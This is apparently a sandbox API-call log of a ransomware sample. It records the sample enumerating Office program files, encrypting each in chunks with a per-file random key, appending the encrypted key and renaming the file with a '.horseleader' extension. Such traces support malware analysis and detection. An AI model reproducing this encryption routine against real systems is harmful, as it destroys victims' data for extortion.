(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.011] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0244.011] CloseHandle (hObject=0x158) returned 1 [0244.011] GetProcessHeap () returned 0x780000 [0244.011] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.011] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520efa00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xd83064e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x520efa00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x7eb48, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EXPSRV.DLL", cAlternateFileName="")) returned 1 [0244.011] lstrcmpiW (lpString1="EXPSRV.DLL", lpString2="Windows") returned -1 [0244.011] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 70 [0244.012] StrStrIW (lpFirst="EXPSRV.DLL", lpSrch=".horseleader") returned 0x0 [0244.012] lstrcmpW (lpString1="EXPSRV.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.012] lstrcmpW (lpString1="EXPSRV.DLL", lpString2="_uninstalling_.png") returned 1 [0244.012] lstrlenW (lpString=".testttjffg") returned 11 [0244.012] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL", lpSrch=".testttjffg") returned 0x0 [0244.012] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.012] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.012] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.013] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 70 [0244.013] StrStrW (lpFirst="EXPSRV.DLL", lpSrch=".txt") returned 0x0 [0244.013] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=518984) returned 1 [0244.013] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.013] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.017] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.017] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.019] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3cda4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.019] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.024] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.024] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.039] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x79b48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.040] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.041] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.041] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.042] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.042] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.042] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.042] CloseHandle (hObject=0x158) returned 1 [0244.042] GetProcessHeap () returned 0x780000 [0244.043] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.043] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.horseleader") returned 82 [0244.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll.horseleader")) returned 1 [0244.044] GetProcessHeap () returned 0x780000 [0244.044] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.044] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ebd7300, ftCreationTime.dwHighDateTime=0x1cba5c3, ftLastAccessTime.dwLowDateTime=0xcef710e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3ebd7300, ftLastWriteTime.dwHighDateTime=0x1cba5c3, nFileSizeHigh=0x0, nFileSizeLow=0x21d78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EXP_PDF.DLL", cAlternateFileName="")) returned 1 [0244.044] lstrcmpiW (lpString1="EXP_PDF.DLL", lpString2="Windows") returned -1 [0244.044] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 71 [0244.044] StrStrIW (lpFirst="EXP_PDF.DLL", lpSrch=".horseleader") returned 0x0 [0244.044] lstrcmpW (lpString1="EXP_PDF.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.044] lstrcmpW (lpString1="EXP_PDF.DLL", lpString2="_uninstalling_.png") returned 1 [0244.044] lstrlenW (lpString=".testttjffg") returned 11 [0244.044] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL", lpSrch=".testttjffg") returned 0x0 [0244.044] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.044] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.046] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 71 [0244.046] StrStrW (lpFirst="EXP_PDF.DLL", lpSrch=".txt") returned 0x0 [0244.046] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=138616) returned 1 [0244.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.047] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.051] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xe6bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.051] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.052] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.052] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.052] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1cd78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.052] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.053] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.053] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.054] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.054] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.054] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.054] CloseHandle (hObject=0x158) returned 1 [0244.055] GetProcessHeap () returned 0x780000 [0244.055] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.055] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.horseleader") returned 83 [0244.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll.horseleader")) returned 1 [0244.056] GetProcessHeap () returned 0x780000 [0244.056] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.056] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5bf6900, ftCreationTime.dwHighDateTime=0x1cba06e, ftLastAccessTime.dwLowDateTime=0xcf5b0aa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf5bf6900, ftLastWriteTime.dwHighDateTime=0x1cba06e, nFileSizeHigh=0x0, nFileSizeLow=0x11578, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EXP_XPS.DLL", cAlternateFileName="")) returned 1 [0244.056] lstrcmpiW (lpString1="EXP_XPS.DLL", lpString2="Windows") returned -1 [0244.056] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL") returned 71 [0244.056] StrStrIW (lpFirst="EXP_XPS.DLL", lpSrch=".horseleader") returned 0x0 [0244.057] lstrcmpW (lpString1="EXP_XPS.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.057] lstrcmpW (lpString1="EXP_XPS.DLL", lpString2="_uninstalling_.png") returned 1 [0244.057] lstrlenW (lpString=".testttjffg") returned 11 [0244.057] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL", lpSrch=".testttjffg") returned 0x0 [0244.057] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.057] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL") returned 71 [0244.059] StrStrW (lpFirst="EXP_XPS.DLL", lpSrch=".txt") returned 0x0 [0244.059] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=71032) returned 1 [0244.059] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.060] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.063] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.064] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.064] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x62bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.064] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.065] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.065] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.066] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.066] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.066] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.067] CloseHandle (hObject=0x158) returned 1 [0244.067] GetProcessHeap () returned 0x780000 [0244.067] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.067] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL.horseleader") returned 83 [0244.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll.horseleader")) returned 1 [0244.069] GetProcessHeap () returned 0x780000 [0244.069] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.069] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd66e7600, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xe572de20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd66e7600, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x26560, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FLTLDR.EXE", cAlternateFileName="")) returned 1 [0244.069] lstrcmpiW (lpString1="FLTLDR.EXE", lpString2="Windows") returned -1 [0244.069] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 70 [0244.069] StrStrIW (lpFirst="FLTLDR.EXE", lpSrch=".horseleader") returned 0x0 [0244.069] lstrcmpW (lpString1="FLTLDR.EXE", lpString2="#Decrypt#.txt") returned 1 [0244.069] lstrcmpW (lpString1="FLTLDR.EXE", lpString2="_uninstalling_.png") returned 1 [0244.069] lstrlenW (lpString=".testttjffg") returned 11 [0244.069] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE", lpSrch=".testttjffg") returned 0x0 [0244.069] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.069] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.070] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 70 [0244.072] StrStrW (lpFirst="FLTLDR.EXE", lpSrch=".txt") returned 0x0 [0244.072] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=157024) returned 1 [0244.072] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.072] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.075] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.076] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.076] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x10ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.077] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 